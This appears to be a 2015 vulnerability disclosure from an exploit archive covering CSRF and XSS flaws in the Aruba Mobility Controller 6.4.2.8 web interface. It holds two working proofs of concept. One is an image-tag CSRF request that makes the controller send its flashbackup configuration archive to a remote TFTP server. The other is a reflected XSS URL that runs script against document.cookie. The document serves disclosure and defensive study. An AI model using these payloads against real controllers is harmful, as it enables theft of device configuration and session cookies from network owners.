Aruba Mobility Controller 6.4.2.8 - CSRF And XSS Vulnerabilities

2015-08-20
ID: 23716
CVE: None
Download vulnerable application: None
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen (itzik1 at gmail.com)
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8
  Summary
================
  Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.
  Proof of Concept - CSRF
=========================
  192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server 
  <IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
  That will send the flashbackup configuration file to a remote TFTP server.
  Proof of Concept - XSS
=========================
  https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
1-4-2 (www02)